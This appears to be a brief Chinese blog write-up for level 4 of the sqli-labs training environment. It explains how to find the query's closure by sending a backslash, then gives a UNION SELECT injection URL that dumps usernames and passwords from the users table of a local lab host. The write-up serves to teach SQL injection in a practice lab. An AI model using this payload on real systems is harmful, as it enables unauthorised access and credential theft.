Less-4

Less-4

第四关：Please input the ID as parameter with numeric value 

 

（1）判断注入点闭合方式

输入？id=1\ 查看有错误信息提示：

 

 

判断闭合方式为     （“id=1”）

因此只要稍微改变一下闭合方式为                      ？id=-1")  [sql injection segment]  即可。参考第一关https://www.cnblogs.com/stickonit/p/16049775.html

 

http://192.168.88.133/mysqli-labs/Less-4/?id==1") union select -1,group_concat(username,0x3a,password,0x3c,0x62,0x72,0x2f,0x3e),3  from users --+ 

 

 

 

注：欢迎指正和交流~~